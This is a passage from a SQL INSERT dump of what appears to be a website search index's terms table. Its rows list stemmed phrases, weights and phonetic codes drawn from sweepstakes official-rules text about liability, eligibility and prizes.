a',0,1,1.4333,'G6351',1,'en'),(26777,'guidance','guidanc',0,0,0.5333,'G352',1,'en'),(26778,'guidance in','guidanc in',0,1,1.3667,'G3525',1,'en'),(26779,'guidance in the','guidanc in the',0,1,1.5,'G35253',1,'en'),(26780,'guide','guid',0,0,0.3333,'G300',1,'en'),(26781,'guide to','guid to',0,1,1.2667,'G300',1,'en'),(26782,'guide to development','guid to development',0,1,1.6667,'G314153',1,'en'),(26783,'guide to stevegriffin','guid to stevegriffin',0,1,1.7,'G32312615',1,'en'),(26784,'guide to style','guid to style',0,1,1.4667,'G3234',1,'en'),(26785,'h of','h of',0,1,1.1333,'H100',1,'en'),(26786,'h of noncompliance','h of noncompliance',0,1,1.6,'H15251452',1,'en'),(26787,'hand','hand',0,0,0.2667,'H530',3,'en'),(26788,'hand start','hand start',0,1,1.3333,'H532363',1,'en'),(26789,'hand start date','hand start date',0,1,1.5,'H532363',1,'en'),(26790,'hardwood','hardwood',0,0,0.5333,'H630',1,'en'),(26791,'hardwood base','hardwood base',0,1,1.4333,'H6312',1,'en'),(26792,'hardwood base big','hardwood base big',0,1,1.5667,'H631212',1,'en'),(26793,'harmless','harmless',0,0,0.5333,'H6542',1,'en'),(26794,'harmless sponsor','harmless sponsor',0,1,1.5333,'H65421526',1,'en'),(26795,'harmless sponsor and','harmless sponsor and',0,1,1.6667,'H6542152653',1,'en'),(26796,'has been exerted','ha been exerted',0,1,1.5333,'H215263',1,'en'),(26797,'has neither','ha neither',0,1,1.3667,'H2536',1,'en'),(26798,'has neither made','ha neither made',0,1,1.5333,'H253653',1,'en'),(26799,'has replied','ha replied',0,1,1.3667,'H26143',1,'en'),(26800,'has replied sponsor','ha replied sponsor',0,1,1.6333,'H2614321526',1,'en'),(26801,'have a total','have a total',0,1,1.4,'H134',1,'en'),(26802,'have any','have any',0,1,1.2667,'H150',1,'en'),(26803,'have any obligation','have any obligation',0,1,1.6333,'H1514235',1,'en'),(26804,'have been provided','have been provided',0,1,1.6,'H151613',1,'en'),(26805,'have committed','have committed',0,1,1.4667,'H1253',1,'en'),(26806,'have committed fraud','have committed fraud',0,1,1.6667,'H1253163',1,'en'),(26807,'have he','have he',0,1,1.2333,'H100',1,'en'),(26808,'have he any','have he any',0,1,1.3667,'H150',1,'en'),(26809,'have no','have no',0,1,1.2333,'H150',1,'en'),(26810,'have no responsibilities','have no responsibilities',0,1,1.8,'H15621521432',1,'en'),(26811,'have notarized','have notarized',0,1,1.4667,'H153623',1,'en'),(26812,'have notarized and','have notarized and',0,1,1.6,'H15362353',1,'en'),(26813,'have within','have within',0,1,1.3667,'H135',1,'en'),(26814,'have within one','have within one',0,1,1.5,'H135',1,'en'),(26815,'have.9.daily','have.9.daili',0,0,0.8,'H134',1,'en'),(26816,'have.9.daily affixed','have.9.daili affixed',0,1,1.6667,'H134123',1,'en'),(26817,'have.9.daily affixed so','have.9.daili affixed so',0,1,1.7667,'H1341232',1,'en'),(26818,'having jurisdiction','have jurisdiction',0,1,1.6333,'H152623235',1,'en'),(26819,'having jurisdiction over','have jurisdiction over',0,1,1.8,'H15262323516',1,'en'),(26820,'having to','have to',0,1,1.3,'H1523',1,'en'),(26821,'having to do','have to do',0,1,1.4,'H1523',1,'en'),(26822,'hazards','hazard',0,0,0.4667,'H2632',1,'en'),(26823,'hazards winner','hazard winner',0,1,1.4667,'H263256',1,'en'),(26824,'hazards winner s','hazard winner s',0,1,1.5333,'H2632562',1,'en'),(26825,'he any','he any',0,1,1.2,'H500',1,'en'),(26826,'he any destruction','he any destruction',0,1,1.6,'H53236235',1,'en'),(26827,'he she','he she',0,1,1.2,'H200',1,'en'),(26828,'he she enters','he she enters',0,1,1.4333,'H25362',1,'en'),(26829,'help incorrect','help incorrect',0,1,1.4667,'H4152623',1,'en'),(26830,'help incorrect use','help incorrect use',0,1,1.6,'H41526232',1,'en'),(26831,'her entry','her entry',0,1,1.3,'H6536',1,'en'),(26832,'her entry an','her entry an',0,1,1.4,'H65365',1,'en'),(26833,'her entry on','her entry on',0,1,1.4,'H65365',1,'en'),(26834,'her parent','her parent',0,1,1.3333,'H61653',1,'en'),(26835,'her parent legal','her parent legal',0,1,1.5333,'H61653424',1,'en'),(26836,'her person\'s','her person',0,1,1.4,'H616252',1,'en'),(26837,'her person\'s name','her person name',0,1,1.5667,'H6162525',1,'en'),(26838,'her prize','her prize',0,1,1.3,'H6162',1,'en'),(26839,'her prize capability','her prize capability',0,1,1.6667,'H6162143',1,'en'),(26840,'her state','her state',0,1,1.3,'H623',1,'en'),(26841,'her state state','her state state',0,1,1.5,'H62323',1,'en'),(26842,'her to','her to',0,1,1.2,'H630',1,'en'),(26843,'her to be','her to be',0,1,1.3,'H631',1,'en'),(26844,'hereafter','hereaft',0,0,0.6,'H6136',1,'en'),(26845,'hereafter created','hereaft created',0,1,1.5667,'H6136263',1,'en'),(26846,'hereafter created to','hereaft created to',0,1,1.6667,'H6136263',1,'en'),(26847,'hereafter made','hereaft made',0,1,1.4667,'H613653',1,'en'),(26848,'hereafter made incorporating','hereaft made incorporating',0,1,1.9333,'H61365352616352',1,'en'),(26849,'hereby','herebi',0,0,0.4,'H610',1,'en'),(26850,'hereby irrevocably','herebi irrevocably',0,1,1.6,'H6161214',1,'en'),(26851,'hereby irrevocably consent','herebi irrevocably consent',0,1,1.8667,'H616121425253',1,'en'),(26852,'herein','herein',0,0,0.4,'H650',1,'en'),(26853,'herein are','herein are',0,1,1.3333,'H656',1,'en'),(26854,'herein are solely','herein are solely',0,1,1.5667,'H65624',1,'en'),(26855,'herein will','herein will',0,1,1.3667,'H654',1,'en'),(26856,'herein will be','herein will be',0,1,1.4667,'H6541',1,'en'),(26857,'him','him',0,0,0.2,'H500',5,'en'),(26858,'him her','him her',0,1,1.2333,'H560',1,'en'),(26859,'him her to','him her to',0,1,1.3333,'H563',1,'en'),(26860,'his her','hi her',0,1,1.2333,'H260',1,'en'),(26861,'his her entry','hi her entry',0,1,1.4333,'H26536',1,'en'),(26862,'his her parent','hi her parent',0,1,1.4667,'H261653',1,'en'),(26863,'his her person\'s','hi her person',0,1,1.5333,'H2616252',1,'en'),(26864,'his her prize','hi her prize',0,1,1.4333,'H26162',1,'en'),(26865,'his her state','hi her state',0,1,1.4333,'H2623',1,'en'),(26866,'hold','hold',0,0,0.2667,'H430',4,'en'),(26867,'hold harmless','hold harmless',0,1,1.4333,'H436542',1,'en'),(26868,'hold harmless sponsor','hold harmless sponsor',0,1,1.7,'H4365421526',1,'en'),(26869,'home and','home and',0,1,1.2667,'H530',1,'en'),(26870,'home and real','home and real',0,1,1.4333,'H5364',1,'en'),(26871,'home mailing','home mailing',0,1,1.4,'H5452',1,'en'),(26872,'home mailing address','home mailing address',0,1,1.6667,'H5452362',1,'en'),(26873,'house of','hous of',0,1,1.2667,'H210',1,'en'),(26874,'house of sponsor','hous of sponsor',0,1,1.5333,'H2121526',1,'en'),(26875,'how caused','how caused',0,1,1.3333,'H230',1,'en'),(26876,'how caused relating','how caused relating',0,1,1.6333,'H2364352',1,'en'),(26877,'human','human',0,0,0.3333,'H500',1,'en'),(26878,'human or','human or',0,1,1.2667,'H560',1,'en'),(26879,'human or technical','human or technical',0,1,1.6,'H5632524',1,'en'),(26880,'if a','if a',0,1,1.1333,'I100',1,'en'),(26881,'if a prize','if a prize',0,1,1.3333,'I162',1,'en'),(26882,'if a resident','if a resident',0,1,1.4333,'I162353',1,'en'),(26883,'if entrant\'s','if entrant',0,1,1.4,'I1536532',1,'en'),(26884,'if entrant\'s e','if entrant e',0,1,1.4667,'I1536532',1,'en'),(26885,'if sponsor','if sponsor',0,1,1.3333,'I121526',1,'en'),(26886,'if sponsor finds','if sponsor finds',0,1,1.5333,'I1215261532',1,'en'),(26887,'illegible','illeg',0,0,0.6,'I4214',1,'en'),(26888,'illegible unintelligible','illeg unintelligible',0,1,1.8,'I4214534214',1,'en'),(26889,'illegible unintelligible damaged','illeg unintelligible damaged',0,1,2,'I42145342143523',1,'en'),(26890,'illustrative','illustr',0,0,0.8,'I423631',1,'en'),(26891,'illustrative usages','illustr usages',0,1,1.6333,'I4236312',1,'en'),(26892,'illustrative usages only','illustr usages only',0,1,1.8,'I423631254',1,'en'),(26893,'image or','imag or',0,1,1.2667,'I526',1,'en'),(26894,'image or likeness','imag or likeness',0,1,1.5667,'I5264252',1,'en'),(26895,'images','imag',0,0,0.4,'I520',1,'en'),(26896,'images or','imag or',0,1,1.3,'I526',1,'en'),(26897,'images or other','imag or other',0,1,1.5,'I52636',1,'en'),(26898,'immediate','immedi',0,0,0.6,'I530',1,'en'),(26899,'immediate family','immedi family',0,1,1.5333,'I53154',1,'en'),(26900,'immediate family and','immedi family and',0,1,1.6667,'I5315453',1,'en'),(26901,'immediate relatives','immedi relatives',0,1,1.6333,'I5364312',1,'en'),(26902,'immediate relatives shall','immedi relatives shall',0,1,1.8333,'I53643124',1,'en'),(26903,'impress','impress',0,0,0.4667,'I5162',1,'en'),(26904,'impress television','impress television',0,1,1.6,'I516234125',1,'en'),(26905,'impress television for','impress television for',0,1,1.7333,'I51623412516',1,'en'),(26906,'improve','improv',0,0,0.4667,'I5161',1,'en'),(26907,'improve your','improv your',0,1,1.4,'I51616',1,'en'),(26908,'improve your odds','improv your odds',0,1,1.5667,'I5161632',1,'en'),(26909,'in accordance','in accordance',0,1,1.4333,'I526352',1,'en'),(26910,'in accordance with','in accordance with',0,1,1.6,'I5263523',1,'en'),(26911,'in addition k','in addition k',0,1,1.4333,'I5352',1,'en'),(26912,'in addition to','in addition to',0,1,1.4667,'I5353',1,'en'),(26913,'in all','in all',0,1,1.2,'I540',1,'en'),(26914,'in all respects','in all respects',0,1,1.5,'I54621232',1,'en'),(26915,'in almost','in almost',0,1,1.3,'I54523',1,'en'),(26916,'in almost any','in almost any',0,1,1.4333,'I545235',1,'en'),(26917,'in any manner','in any manner',0,1,1.4333,'I560',1,'en'),(26918,'in any recognizable','in any recognizable',0,1,1.6333,'I5625214',1,'en'),(26919,'in any sweepstakes','in any sweepstakes',0,1,1.6,'I521232',1,'en'),(26920,'in association','in association',0,1,1.4667,'I5235',1,'en'),(26921,'in association with','in association with',0,1,1.6333,'I52353',1,'en'),(26922,'in entering','in entering',0,1,1.3667,'I53652',1,'en'),(26923,'in entering or','in entering or',0,1,1.4667,'I536526',1,'en'),(26924,'in entries','in entries',0,1,1.3333,'I5362',1,'en'),(26925,'in entries appears','in entries appears',0,1,1.6,'I5362162',1,'en'),(26926,'in his','in his',0,1,1.2,'I520',1,'en'),(26927,'in his her','in his her',0,1,1.3333,'I526',1,'en'),(26928,'in its','in its',0,1,1.2,'I532',1,'en'),(26929,'in its sole','in its sole',0,1,1.3667,'I5324',1,'en'),(26930,'in law','in law',0,1,1.2,'I540',1,'en'),(26931,'in law in','in law in',0,1,1.3,'I545',1,'en'),(26932,'in must','in must',0,1,1.2333,'I523',1,'en'),(26933,'in must first','in must first',0,1,1.4333,'I5231623',1,'en'),(26934,'in part','in part',0,1,1.2333,'I5163',1,'en'),(26935,'in part and','in part and',0,1,1.3667,'I516353',1,'en'),(26936,'in part due','in part due',0,1,1.3667,'I5163',1,'en'),(26937,'in part worldwide','in part worldwide',0,1,1.5667,'I5163643',1,'en'),(26938,'in perpetuity','in perpetuity',0,1,1.4333,'I51613',1,'en'),(26939,'in perpetuity for','in perpetuity for',0,1,1.5667,'I5161316',1,'en'),(26940,'in sponsor','in sponsor',0,1,1.3333,'I521526',1,'en'),(26941,'in sponsor policy','in sponsor policy',0,1,1.5667,'I521526142',1,'en'),(26942,'in the best','in the best',0,1,1.3667,'I53123',1,'en'),(26943,'in the body','in the body',0,1,1.3667,'I5313',1,'en'),(26944,'in the contests','in the contests',0,1,1.5,'I53253232',1,'en'),(26945,'in the county','in the county',0,1,1.4333,'I53253',1,'en'),(26946,'in the entry','in the entry',0,1,1.4,'I53536',1,'en'),(26947,'in the notification','in the notification',0,1,1.6333,'I53531235',1,'en'),(26948,'in the official','in the official',0,1,1.5,'I53124',1,'en'),(26949,'in the sweepstakes','in the sweepstakes',0,1,1.6,'I5321232',1,'en'),(26950,'in violation','in violation',0,1,1.4,'I51435',1,'en'),(26951,'in violation of','in violation of',0,1,1.5,'I514351',1,'en'),(26952,'inability','inabl',0,0,0.6,'I5143',1,'en'),(26953,'inability of','inabl of',0,1,1.4,'I51431',1,'en'),(26954,'inability of the','inabl of the',0,1,1.5333,'I514313',1,'en'),(26955,'inadvertent','inadvert',0,0,0.7333,'I5316353',1,'en'),(26956,'inadvertent expenses','inadvert expenses',0,1,1.6667,'I53163532152',1,'en'),(26957,'inadvertent expenses prize','inadvert expenses prize',0,1,1.8667,'I53163532152162',1,'en'),(26958,'include but','includ but',0,1,1.3667,'I524313',1,'en'),(26959,'include but not','includ but not',0,1,1.5,'I52431353',1,'en'),(26960,'include these','includ these',0,1,1.4333,'I52432',1,'en'),(26961,'include these official','includ these official',0,1,1.7333,'I52432124',1,'en'),(26962,'including any','includ any',0,1,1.4333,'I5243525',1,'en'),(26963,'including any liability','includ any liability',0,1,1.7667,'I52435254143',1,'en'),(26964,'including but','includ but',0,1,1.4333,'I52435213',1,'en'),(26965,'including but not','includ but not',0,1,1.5667,'I5243521353',1,'en'),(26966,'including without','includ without',0,1,1.5667,'I5243523',1,'en'),(26967,'including without limitation','includ without limitation',0,1,1.9333,'I52435234535',1,'en'),(26968,'incorporating','incorpor',0,0,0.8667,'I52616352',1,'en'),(26969,'incorporating but','incorpor but',0,1,1.5667,'I5261635213',1,'en'),(26970,'incorporating but not','incorpor but not',0,1,1.7,'I526163521353',1,'en'),(26971,'incorrect','incorrect',0,0,0.6,'I52623',1,'en'),(26972,'incorrect use','incorrect use',0,1,1.4333,'I526232',1,'en'),(26973,'incorrect use loss','incorrect use loss',0,1,1.6,'I52623242',1,'en'),(26974,'individuals are','individu are',0,1,1.5,'I5313426',1,'en'),(26975,'individuals are not','individu are not',0,1,1.6333,'I531342653',1,'en'),(26976,'ineligible','inelig',0,0,0.6667,'I54214',1,'en'),(26977,'ineligible to','inelig to',0,1,1.4333,'I542143',1,'en'),(26978,'ineligible to enter','inelig to enter',0,1,1.6333,'I542143536',1,'en'),(26979,'info','info',0,0,0.2667,'I510',2,'en'),(26980,'info requested','info requested',0,1,1.4667,'I51623',1,'en'),(26981,'info requested in','info requested in',0,1,1.5667,'I516235',1,'en'),(26982,'info with','info with',0,1,1.3,'I513',1,'en'),(26983,'info with sponsor','info with sponsor',0,1,1.5667,'I51321526',1,'en'),(26984,'information by','inform by',0,1,1.4667,'I5165351',1,'en'),(26985,'information by sponsor','inform by sponsor',0,1,1.7333,'I516535121526',1,'en'),(26986,'information collected','inform collected',0,1,1.7,'I5165352423',1,'en'),(26987,'information collected by','inform collected by',0,1,1.8,'I51653524231',1,'en'),(26988,'information except','inform except',0,1,1.6,'I516535213',1,'en'),(26989,'information except where','inform except where',0,1,1.8,'I5165352136',1,'en'),(26990,'information regarding','inform regarding',0,1,1.7,'I516535626352',1,'en'),(26991,'information regarding the','inform regarding the',0,1,1.8333,'I5165356263523',1,'en'),(26992,'information stated','inform stated',0,1,1.6,'I51653523',1,'en'),(26993,'information stated in','inform stated in',0,1,1.7,'I516535235',1,'en'),(26994,'information will','inform will',0,1,1.5333,'I5165354',1,'en'),(26995,'information will not','inform will not',0,1,1.6667,'I516535453',1,'en'),(26996,'injure','injur',0,0,0.4,'I526',1,'en'),(26997,'injure dings','injur dings',0,1,1.4,'I526352',1,'en'),(26998,'injure dings shock','injur dings shock',0,1,1.6,'I526352',1,'en'),(26999,'injuries or','injuri or',0,1,1.3667,'I52626',1,'en'),(27000,'injuries or losses','injuri or losses',0,1,1.6,'I5262642',1,'en'),(27001,'injury','injuri',0,0,0.4,'I526',1,'en'),(27002,'injury or','injuri or',0,1,1.3,'I526',1,'en'),(27003,'injury or damage','injuri or damage',0,1,1.5333,'I526352',1,'en'),(27004,'instructions','instruct',0,0,0.8,'I52362352',1,'en'),(27005,'instructions contained','instruct contained',0,1,1.7333,'I523623525353',1,'en'),(27006,'instructions contained in','instruct contained in',0,1,1.8333,'I5236235253535',1,'en'),(27007,'integrating','integr',0,0,0.7333,'I5326352',1,'en'),(27008,'integrating but','integr but',0,1,1.5,'I532635213',1,'en'),(27009,'integrating but not','integr but not',0,1,1.6333,'I53263521353',1,'en'),(27010,'integrity','integr',0,0,0.6,'I53263',1,'en'),(27011,'integrity or','integr or',0,1,1.4,'I532636',1,'en'),(27012,'integrity or viability','integr or viability',0,1,1.7333,'I532636143',1,'en'),(27013,'intended','intend',0,0,0.5333,'I5353',1,'en'),(27014,'intended recipient','intend recipient',0,1,1.6,'I535362153',1,'en'),(27015,'intended recipient entirely','intend recipient entirely',0,1,1.9,'I5353621535364',1,'en'),(27016,'intended truly','intend truly',0,1,1.4667,'I535364',1,'en'),(27017,'intended truly or','intend truly or',0,1,1.5667,'I5353646',1,'en'),(27018,'internet or','internet or',0,1,1.3667,'I536536',1,'en'),(27019,'internet or computer','internet or computer',0,1,1.6667,'I53653625136',1,'en'),(27020,'invasion','invas',0,0,0.5333,'I5125',1,'en'),(27021,'invasion of','invas of',0,1,1.3667,'I51251',1,'en'),(27022,'invasion of privacy','invas of privacy',0,1,1.6333,'I51251612',1,'en'),(27023,'irrevocably','irrevoc',0,0,0.7333,'I61214',1,'en'),(27024,'irrevocably consent','irrevoc consent',0,1,1.6333,'I6121425253',1,'en'),(27025,'irrevocably consent to','irrevoc consent to',0,1,1.7333,'I6121425253',1,'en'),(27026,'irs','ir',0,0,0.2,'I620',1,'en'),(27027,'irs federal','ir federal',0,1,1.3667,'I621364',1,'en'),(27028,'irs federal 1099','ir federal 1099',0,1,1.5333,'I621364',1,'en'),(27029,'is 1000','is 1000',0,1,1.2333,'I200',1,'en'),(27030,'is 1000 and','is 1000 and',0,1,1.3667,'I253',1,'en'),(27031,'is a registered','is a registered',0,1,1.5,'I262363',1,'en'),(27032,'is familiar','is familiar',0,1,1.3667,'I21546',1,'en'),(27033,'is familiar any','is familiar any',0,1,1.5,'I215465',1,'en'),(27034,'is found','is found',0,1,1.2667,'I2153',1,'en'),(27035,'is found to','is found to',0,1,1.3667,'I2153',1,'en'),(27036,'is it','is it',0,1,1.1667,'I230',1,'en'),(27037,'is it responsible','is it responsible',0,1,1.5667,'I236215214',1,'en'),(27038,'is not affiliated','is not affiliated',0,1,1.5667,'I253143',1,'en'),(27039,'is not regarding','is not regarding',0,1,1.5333,'I253626352',1,'en'),(27040,'is related','is related',0,1,1.3333,'I2643',1,'en'),(27041,'is related to','is related to',0,1,1.4333,'I2643',1,'en'),(27042,'is returned','is returned',0,1,1.3667,'I263653',1,'en'),(27043,'is returned as','is returned as',0,1,1.4667,'I2636532',1,'en'),(27044,'is subject','is subject',0,1,1.3333,'I2123',1,'en'),(27045,'is subject to','is subject to',0,1,1.4333,'I2123',1,'en'),(27046,'is submitted','is submitted',0,1,1.4,'I2153',1,'en'),(27047,'is submitted to','is submitted to',0,1,1.5,'I2153',1,'en'),(27048,'is the entrant\'s','is the entrant',0,1,1.5333,'I23536532',1,'en'),(27049,'is to be','is to be',0,1,1.2667,'I231',1,'en'),(27050,'is under','is under',0,1,1.2667,'I2536',1,'en'),(27051,'is under the','is under the',0,1,1.4,'I25363',1,'en'),(27052,'is void','is void',0,1,1.2333,'I213',1,'en'),(27053,'is void wherever','is void wherever',0,1,1.5333,'I213616',1,'en'),(27054,'issue','issu',0,0,0.3333,'I200',3,'en'),(27055,'issue and','issu and',0,1,1.3,'I253',1,'en'),(27056,'issue and or','issu and or',0,1,1.4,'I2536',1,'en'),(27057,'issue ban','issu ban',0,1,1.3,'I215',1,'en'),(27058,'issue ban pay','issu ban pay',0,1,1.4333,'I2151',1,'en'),(27059,'issues','issu',0,0,0.4,'I200',1,'en'),(27060,'issues and','issu and',0,1,1.3333,'I253',1,'en'),(27061,'issues and questions','issu and questions',0,1,1.6667,'I2532352',1,'en'),(27062,'it finds','it finds',0,1,1.2667,'I31532',1,'en'),(27063,'it finds to','it finds to',0,1,1.3667,'I315323',1,'en'),(27064,'it responsible','it responsible',0,1,1.4667,'I36215214',1,'en'),(27065,'it responsible for','it responsible for',0,1,1.6,'I3621521416',1,'en'),(27066,'its own','it own',0,1,1.2333,'I325',1,'en'),(27067,'its own parents','it own parents',0,1,1.5,'I32516532',1,'en'),(27068,'its parent','it parent',0,1,1.3333,'I321653',1,'en'),(27069,'its parent companies','it parent companies',0,1,1.6667,'I32165325152',1,'en'),(27070,'its parent producers','it parent producers',0,1,1.6667,'I321653163262',1,'en'),(27071,'its parent solutions','it parent solutions',0,1,1.6667,'I32165324352',1,'en'),(27072,'its sole','it sole',0,1,1.2667,'I324',1,'en'),(27073,'its sole acumen','it sole acumen',0,1,1.5,'I32425',1,'en'),(27074,'its sole foresight','it sole foresight',0,1,1.6,'I3241623',1,'en'),(27075,'its sole prudence','it sole prudence',0,1,1.5667,'I32416352',1,'en'),(27076,'july 12','juli 12',0,1,1.2333,'J400',1,'en'),(27077,'july 12 2007.odds','juli 12 2007.odds',0,1,1.5667,'J432',1,'en'),(27078,'july 19th','juli 19th',0,1,1.3,'J430',1,'en'),(27079,'july 19th 2007.the','juli 19th 2007.the',0,1,1.6,'J430',1,'en'),(27080,'july 2','juli 2',0,1,1.2,'J400',1,'en'),(27081,'july 2 2007.max','juli 2 2007.max',0,1,1.5,'J452',1,'en'),(27082,'july 2nd','juli 2nd',0,1,1.2667,'J453',1,'en'),(27083,'july 2nd 2007','juli 2nd 2007',0,1,1.4333,'J453',1,'en'),(27084,'jurisdiction','jurisdict',0,0,0.8,'J623235',1,'en'),(27085,'jurisdiction of','jurisdict of',0,1,1.5,'J6232351',1,'en'),(27086,'jurisdiction of said','jurisdict of said',0,1,1.6667,'J623235123',1,'en'),(27087,'jurisdiction other','jurisdict other',0,1,1.6,'J62323536',1,'en'),(27088,'jurisdiction other than','jurisdict other than',0,1,1.7667,'J6232353635',1,'en'),(27089,'jurisdiction over','jurisdict over',0,1,1.5667,'J62323516',1,'en'),(27090,'jurisdiction over the','jurisdict over the',0,1,1.7,'J623235163',1,'en'),(27091,'jurisdiction they','jurisdict they',0,1,1.5667,'J6232353',1,'en'),(27092,'jurisdiction they may','jurisdict they may',0,1,1.7,'J62323535',1,'en'),(27093,'jurisdiction which','jurisdict which',0,1,1.6,'J6232352',1,'en'),(27094,'jurisdiction which would','jurisdict which would',0,1,1.8,'J623235243',1,'en'),(27095,'k entering','k entering',0,1,1.3333,'K53652',1,'en'),(27096,'k entering or','k entering or',0,1,1.4333,'K536526',1,'en'),(27097,'kind caused','kind caused',0,1,1.3667,'K5323',1,'en'),(27098,'kind caused by','kind caused by',0,1,1.4667,'K53231',1,'en'),(27099,'kind is','kind is',0,1,1.2333,'K532',1,'en'),(27100,'kind is to','kind is to',0,1,1.3333,'K5323',1,'en'),(27101,'known or','known or',0,1,1.2667,'K560',1,'en'),(27102,'known or hereafter','known or hereafter',0,1,1.6,'K56136',1,'en'),(27103,'lack of personal','lack of personal',0,1,1.5333,'L216254',1,'en'),(27104,'later part','later part',0,1,1.3333,'L36163',1,'en'),(27105,'later part of','later part of',0,1,1.4333,'L361631',1,'en'),(27106,'later than','later than',0,1,1.3333,'L3635',1,'en'),(27107,'later than july','later than july',0,1,1.5,'L363524',1,'en'),(27108,'lauren uk will','lauren uk will',0,1,1.4667,'L6524',1,'en'),(27109,'law','law',0,0,0.2,'L000',1,'en'),(27110,'law also','law also',0,1,1.2667,'L200',1,'en'),(27111,'law also by','law also by',0,1,1.3667,'L210',1,'en'),(27112,'law and','law and',0,1,1.2333,'L530',1,'en'),(27113,'law and any','law and any',0,1,1.3667,'L535',1,'en'),(27114,'law and entrants','law and entrants',0,1,1.5333,'L53536532',1,'en'),(27115,'law areas','law areas',0,1,1.3,'L620',1,'en'),(27116,'law areas and','law areas and',0,1,1.4333,'L6253',1,'en'),(27117,'law in','law in',0,1,1.2,'L500',1,'en'),(27118,'law in accordance','law in accordance',0,1,1.5667,'L526352',1,'en'),(27119,'law or','law or',0,1,1.2,'L600',1,'en'),(27120,'law or conflict','law or conflict',0,1,1.5,'L6251423',1,'en'),(27121,'law rules','law rules',0,1,1.3,'L642',1,'en'),(27122,'law rules whether','law rules whether',0,1,1.5667,'L64236',1,'en'),(27123,'law winner','law winner',0,1,1.3333,'L560',1,'en'),(27124,'law winner acceptance','law winner acceptance',0,1,1.7,'L5621352',1,'en'),(27125,'laws','law',0,0,0.2667,'L200',1,'en'),(27126,'laws and','law and',0,1,1.2667,'L253',1,'en'),(27127,'laws and provincial','law and provincial',0,1,1.6333,'L253161524',1,'en'),(27128,'laws of','law of',0,1,1.2333,'L210',1,'en'),(27129,'laws of any','law of any',0,1,1.3667,'L215',1,'en'),(27130,'laws of the','law of the',0,1,1.3667,'L213',1,'en'),(27131,'least','least',0,0,0.3333,'L230',1,'en'),(27132,'least bit','least bit',0,1,1.3,'L2313',1,'en'),(27133,'least bit including','least bit including',0,1,1.6333,'L2313524352',1,'en'),(27134,'least several','least several',0,1,1.4333,'L232164',1,'en'),(27135,'least several weeks','least several weeks',0,1,1.6333,'L2321642',1,'en'),(27136,'legal','legal',0,0,0.3333,'L240',1,'en'),(27137,'legal declare','legal declare',0,1,1.4333,'L243246',1,'en'),(27138,'legal declare and','legal declare and',0,1,1.5667,'L24324653',1,'en'),(27139,'legal guardian','legal guardian',0,1,1.4667,'L242635',1,'en'),(27140,'legal guardian if','legal guardian if',0,1,1.5667,'L2426351',1,'en'),(27141,'legislation','legisl',0,0,0.7333,'L2435',1,'en'),(27142,'legislation that','legisl that',0,1,1.5333,'L24353',1,'en'),(27143,'legislation that deems','legisl that deems',0,1,1.7333,'L2435352',1,'en'),(27144,'lehigh','lehigh',0,0,0.4,'L200',2,'en'),(27145,'lehigh pa','lehigh pa',0,1,1.3,'L210',1,'en'),(27146,'lehigh pa entrants','lehigh pa entrants',0,1,1.6,'L21536532',1,'en'),(27147,'liability','liabil',0,0,0.6,'L143',1,'en'),(27148,'liability concerning','liabil concerning',0,1,1.6667,'L143252652',1,'en'),(27149,'liability concerning or','liabil concerning or',0,1,1.7667,'L1432526526',1,'en'),(27150,'liability for','liabil for',0,1,1.4333,'L14316',1,'en'),(27151,'liability for lowering','liabil for lowering',0,1,1.7333,'L143164652',1,'en'),(27152,'liability please','liabil please',0,1,1.5333,'L143142',1,'en'),(27153,'liability please note','liabil please note',0,1,1.7,'L14314253',1,'en'),(27154,'liability release','liabil release',0,1,1.5667,'L143642',1,'en'),(27155,'liability release subjection','liabil release subjection',0,1,1.9333,'L1436421235',1,'en'),(27156,'liability spotlight','liabil spotlight',0,1,1.6333,'L143213423',1,'en'),(27157,'liability spotlight release','liabil spotlight release',0,1,1.9,'L143213423642',1,'en'),(27158,'liability to','liabil to',0,1,1.4,'L143',1,'en'),(27159,'liability to award','liabil to award',0,1,1.6,'L14363',1,'en'),(27160,'liable','liabl',0,0,0.4,'L140',1,'en'),(27161,'liable for','liabl for',0,1,1.3333,'L1416',1,'en'),(27162,'liable for any','liabl for any',0,1,1.4667,'L14165',1,'en'),(27163,'liberate','liber',0,0,0.5333,'L163',1,'en'),(27164,'liberate and','liber and',0,1,1.4,'L16353',1,'en'),(27165,'liberate and hold','liber and hold',0,1,1.5667,'L1635343',1,'en'),(27166,'likely to be','like to be',0,1,1.4,'L2431',1,'en'),(27167,'likeness','like',0,0,0.5333,'L252',1,'en'),(27168,'likeness of','like of',0,1,1.3667,'L2521',1,'en'),(27169,'likeness of or','like of or',0,1,1.4667,'L25216',1,'en'),(27170,'likenesses','like',0,0,0.6667,'L252',1,'en'),(27171,'likenesses photographs','like photographs',0,1,1.7333,'L252132612',1,'en'),(27172,'likenesses photographs pictures','like photographs pictures',0,1,2,'L25213261212362',1,'en'),(27173,'likenesses std','like std',0,1,1.4667,'L2523',1,'en'),(27174,'likenesses std pictures','like std pictures',0,1,1.7667,'L252312362',1,'en'),(27175,'limitation','limit',0,0,0.6667,'L535',1,'en'),(27176,'limitation home','limit home',0,1,1.5,'L535',1,'en'),(27177,'limitation home and','limit home and',0,1,1.6333,'L5353',1,'en'),(27178,'limitations and','limit and',0,1,1.5,'L535253',1,'en'),(27179,'limitations and or','limit and or',0,1,1.6,'L5352536',1,'en'),(27180,'limited by','limit by',0,1,1.3333,'L531',1,'en'),(27181,'limited by ad','limit by ad',0,1,1.4333,'L5313',1,'en'),(27182,'limited by sales','limit by sales',0,1,1.5333,'L531242',1,'en'),(27183,'limited math','limit math',0,1,1.4,'L5353',1,'en'),(27184,'limited math skill','limit math skill',0,1,1.6,'L535324',1,'en'),(27185,'limits','limit',0,0,0.4,'L532',1,'en'),(27186,'limits stated','limit stated',0,1,1.4333,'L5323',1,'en'),(27187,'limits stated herein','limit stated herein',0,1,1.6667,'L532365',1,'en'),(27188,'linked','link',0,0,0.4,'L523',1,'en'),(27189,'linked to','link to',0,1,1.3,'L523',1,'en'),(27190,'linked to the','link to the',0,1,1.4333,'L523',1,'en'),(27191,'listed herein','list herein',0,1,1.4333,'L2365',1,'en'),(27192,'listed herein are','list herein are',0,1,1.5667,'L23656',1,'en'),(27193,'littermates','litterm',0,0,0.7333,'L36532',1,'en'),(27194,'littermates step','litterm step',0,1,1.5333,'L3653231',1,'en'),(27195,'littermates step brothers','litterm step brothers',0,1,1.8333,'L36532316362',1,'en'),(27196,'little littermates','littl littermates',0,1,1.6,'L3436532',1,'en'),(27197,'little littermates step','littl littermates step',0,1,1.7667,'L343653231',1,'en'),(27198,'live family','live family',0,1,1.3667,'L154',1,'en'),(27199,'live family members','live family members',0,1,1.6333,'L1545162',1,'en'),(27200,'local laws','local 